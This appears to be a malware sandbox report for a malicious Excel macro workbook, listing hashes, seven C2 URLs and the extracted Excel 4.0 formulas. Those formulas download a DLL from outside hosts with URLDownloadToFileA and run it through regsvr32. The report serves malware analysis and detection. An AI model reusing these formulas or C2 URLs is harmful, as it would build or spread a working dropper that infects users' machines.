Overview

overview

10

Static

static

10

5df2efe79c...c.xlsm

windows7-x64

10

5df2efe79c...c.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    5df2efe79c6e75f93ac9be74f47a43217c437571faec1e9dc0ac3b4fca80ad9c

  • Size

    74KB

  • Sample

    241120-zvyaaasgne

  • MD5

    fbd298e0609e96411f6f50a2844c77f8

  • SHA1

    e966ae890cef6b9a67e9b2ddf04716a7458d2827

  • SHA256

    5df2efe79c6e75f93ac9be74f47a43217c437571faec1e9dc0ac3b4fca80ad9c

  • SHA512

    22b7f6da1afdfe4ae3ac7cd72ef2485315d325ebc95dc65f055577a25932afb1a1a152eda155f7a2e917b8f682f95734dc5f95682000508c3526d872addb604e

  • SSDEEP

    1536:uS3FXUcSto0NSVUINwtzLT7OMuuAe0yOcfpXZGsM7VI0E:N310tzSmICpH7OZuvZGsMnE

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://praachichemfood.com/wp-content/lcT43/

http://support.techopesolutions.com/application/zTAIK6GZ8I6zSLk/

http://vulkanvegasbonus.jeunete.com/wp-content/vsQ3Jp0XRqEqsVu/

http://aesiafrique.com/azerty/iTbkP5mpqK/

http://abildtrup.eu/wordpress/H0uDBpR/

http://aaticd.co.za/wp-content/6JENALSdgs0RAPqV20z/

http://actua.dk/res/EaoItn4LAZOeLFrFL/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://praachichemfood.com/wp-content/lcT43/","..\fbd.dll",0,0) =IF('EGVEB'!D9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://support.techopesolutions.com/application/zTAIK6GZ8I6zSLk/","..\fbd.dll",0,0)) =IF('EGVEB'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vulkanvegasbonus.jeunete.com/wp-content/vsQ3Jp0XRqEqsVu/","..\fbd.dll",0,0)) =IF('EGVEB'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aesiafrique.com/azerty/iTbkP5mpqK/","..\fbd.dll",0,0)) =IF('EGVEB'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://abildtrup.eu/wordpress/H0uDBpR/","..\fbd.dll",0,0)) =IF('EGVEB'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aaticd.co.za/wp-content/6JENALSdgs0RAPqV20z/","..\fbd.dll",0,0)) =IF('EGVEB'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://actua.dk/res/EaoItn4LAZOeLFrFL/","..\fbd.dll",0,0)) =IF('EGVEB'!D21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\fbd.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://praachichemfood.com/wp-content/lcT43/

Targets

    • Target

      5df2efe79c6e75f93ac9be74f47a43217c437571faec1e9dc0ac3b4fca80ad9c

    • Size

      74KB

    • MD5

      fbd298e0609e96411f6f50a2844c77f8

    • SHA1

      e966ae890cef6b9a67e9b2ddf04716a7458d2827

    • SHA256

      5df2efe79c6e75f93ac9be74f47a43217c437571faec1e9dc0ac3b4fca80ad9c

    • SHA512

      22b7f6da1afdfe4ae3ac7cd72ef2485315d325ebc95dc65f055577a25932afb1a1a152eda155f7a2e917b8f682f95734dc5f95682000508c3526d872addb604e

    • SSDEEP

      1536:uS3FXUcSto0NSVUINwtzLT7OMuuAe0yOcfpXZGsM7VI0E:N310tzSmICpH7OZuvZGsMnE

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks